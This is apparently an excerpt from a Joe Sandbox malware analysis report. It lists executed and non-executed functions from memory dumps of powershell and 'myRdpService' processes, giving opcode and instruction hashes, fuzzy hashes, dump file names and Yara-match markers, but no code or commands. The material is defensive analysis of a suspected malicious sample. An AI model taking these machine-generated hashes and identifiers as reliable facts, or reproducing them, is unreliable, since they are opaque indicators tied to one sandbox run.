                                                                                                          • Opcode ID: f1e85735e3f7cd3931c5e6d0579d282a0704648500d2f478375ab4ca92656ade
                                                                                                          • Instruction ID: f06a08c7a439444d6de842d3c5e4143ad6addb5075da2eaf5f04c2e5d2e35cf7
                                                                                                          • Opcode Fuzzy Hash: f1e85735e3f7cd3931c5e6d0579d282a0704648500d2f478375ab4ca92656ade
                                                                                                          • Instruction Fuzzy Hash: 7C11E330A0CA598FD754EE38C888966B7E2EF98310B204B7AD008C32A5DA74E480C791
                                                                                                          Function 00007FFC4AD16700 Relevance: .0, Instructions: 50COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000019.00000002.3695574487.00007FFC4AD10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC4AD10000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_25_2_7ffc4ad10000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: c91f8bb5612940347ec11d1d9cf77a374b71f9ec13eb81fd806d63c7de80ac71
                                                                                                          • Instruction ID: 469e4945a641c9f5f07e5be98fcc50465448624d83cb17e23ca828e2e0295137
                                                                                                          • Opcode Fuzzy Hash: c91f8bb5612940347ec11d1d9cf77a374b71f9ec13eb81fd806d63c7de80ac71
                                                                                                          • Instruction Fuzzy Hash: F801217090C51E4BEB69EA74C855ABE76B2EF51310F20017DE04A935E2DE286881CBA1
                                                                                                          Function 00007FFC4AD133B5 Relevance: .0, Instructions: 49COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000019.00000002.3695574487.00007FFC4AD10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC4AD10000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_25_2_7ffc4ad10000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 51aece7dbb89ad7ea954680a06e782dfa3413f05ecb7fbb035b8477b7832b68d
                                                                                                          • Instruction ID: 6455367578e35f92d3ab71fba17ba3220dc1c7a99216674a263251ee5775370c
                                                                                                          • Opcode Fuzzy Hash: 51aece7dbb89ad7ea954680a06e782dfa3413f05ecb7fbb035b8477b7832b68d
                                                                                                          • Instruction Fuzzy Hash: A001677115CB0C8FDB48EF0CE451AA5B7E0FB95324F10056EE58AC3651DA36E882CB45
                                                                                                          Function 00007FFC4AD16F81 Relevance: .0, Instructions: 49COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000019.00000002.3695574487.00007FFC4AD10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC4AD10000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_25_2_7ffc4ad10000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: a8f9d1da4d5d6532edacfd1e986899e49b9a7b01af77843320f8786d6e8d1ed6
                                                                                                          • Instruction ID: 276671893901f8694368677c48440fc2fb2a732d8ad779fa4ec54bd6b4a9d6f3
                                                                                                          • Opcode Fuzzy Hash: a8f9d1da4d5d6532edacfd1e986899e49b9a7b01af77843320f8786d6e8d1ed6
                                                                                                          • Instruction Fuzzy Hash: 7D01206180FE854FE357A77858661E27FE0DF9612030846EFD0C9C7457D8185847C365
                                                                                                          Function 00007FFC4AD16FA0 Relevance: .0, Instructions: 37COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000019.00000002.3695574487.00007FFC4AD10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC4AD10000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_25_2_7ffc4ad10000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 48182cba0c408ae587a808127d16ab49018d93084d47641e30967cb03a10e95e
                                                                                                          • Instruction ID: 3d0c0c3638d3f228c623145148e32fc7f9bc511162a9ecf7babd01686be3c7c2
                                                                                                          • Opcode Fuzzy Hash: 48182cba0c408ae587a808127d16ab49018d93084d47641e30967cb03a10e95e
                                                                                                          • Instruction Fuzzy Hash: 1EF0276090DD190FE368FB7C14561F6BBE1DFA82203044BBED089C3556D92868478394
                                                                                                          Function 00007FFC4AD17040 Relevance: .0, Instructions: 30COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000019.00000002.3695574487.00007FFC4AD10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC4AD10000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_25_2_7ffc4ad10000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 233e5b8895db364488f061e8116d8e61a2eac729a13132acdae11e732c81c101
                                                                                                          • Instruction ID: 0e3d3b24de1e6f4b4685c05e14a130491fe1f9ac2a2054529519a9b518879bbb
                                                                                                          • Opcode Fuzzy Hash: 233e5b8895db364488f061e8116d8e61a2eac729a13132acdae11e732c81c101
                                                                                                          • Instruction Fuzzy Hash: 69F030D691E7CF0FF75E991818211741AF3DB6278072940FBD084471EB54145E0D8776
                                                                                                          Function 00007FFC4AD17140 Relevance: .0, Instructions: 7COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000019.00000002.3695574487.00007FFC4AD10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC4AD10000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_25_2_7ffc4ad10000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 44e6d7ab34fe8d019721324a5d8d2372dd34bce176c333d2ed94e3d6da1d6530
                                                                                                          • Instruction ID: f38fb2d8451eb805f12076c4629676b7a65fc3fef05de0b80ff987ff1e2ea3c4
                                                                                                          • Opcode Fuzzy Hash: 44e6d7ab34fe8d019721324a5d8d2372dd34bce176c333d2ed94e3d6da1d6530
                                                                                                          • Instruction Fuzzy Hash: 21B0928290E7C60FD69E491408100601AA29A3624032920E6C0454B1ABA4148E498726

                                                                                                          Non-executed Functions

                                                                                                          Function 00007FF7C28ADB00 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000002A.00000002.4162135679.00007FF7C27F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7C27F0000, based on PE: true
                                                                                                          • Associated: 0000002A.00000002.4162083333.00007FF7C27F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                          • Associated: 0000002A.00000002.4163193855.00007FF7C2CF6000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                          • Associated: 0000002A.00000002.4163588547.00007FF7C2EB8000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                          • Associated: 0000002A.00000002.4163588547.00007FF7C2FFC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                          • Associated: 0000002A.00000002.4164380426.00007FF7C3250000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                          • Associated: 0000002A.00000002.4164432310.00007FF7C3252000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                          • Associated: 0000002A.00000002.4164432310.00007FF7C3270000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                          • Associated: 0000002A.00000002.4164432310.00007FF7C3273000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                          • Associated: 0000002A.00000002.4164432310.00007FF7C3275000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                          • Associated: 0000002A.00000002.4164613765.00007FF7C3278000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_42_2_7ff7c27f0000_myRdpService.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                          • String ID:
                                                                                                          • API String ID: 2933794660-0
                                                                                                          • Opcode ID: b66d8daab459609d726222c036090e22f93798fcae7550261880a99b86b28e2a
                                                                                                          • Instruction ID: a400b1a90f3ac4c2ac12025500304e80bd71750bbe433df7e3728e66f6f77f51
                                                                                                          • Opcode Fuzzy Hash: b66d8daab459609d726222c036090e22f93798fcae7550261880a99b86b28e2a
                                                                                                          • Instruction Fuzzy Hash: D4112A36B14F028AEB40DF60E8542B873A4FB19768F841E35EE6D967A4DFB8D194C350

                                                                                                          Executed Functions

                                                                                                          Function 00007FFC4ACE33B5 Relevance: .0, Instructions: 49COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000002B.00000002.4154315178.00007FFC4ACE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC4ACE0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_43_2_7ffc4ace0000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: cdf27830e6da78c8404a4c0c86de325c6268414c47b103d82231694f5e6a2248
                                                                                                          • Instruction ID: 76302340def3a7747d069dbc3edb914c44bdf6b79e7011cea6b603fa22221ca6
                                                                                                          • Opcode Fuzzy Hash: cdf27830e6da78c8404a4c0c86de325c6268414c47b103d82231694f5e6a2248
                                                                                                          • Instruction Fuzzy Hash: 4C01677115CB0C8FD744EF0CE451AA6B7E0FB95324F10056DE58AC3651DA36E882CB45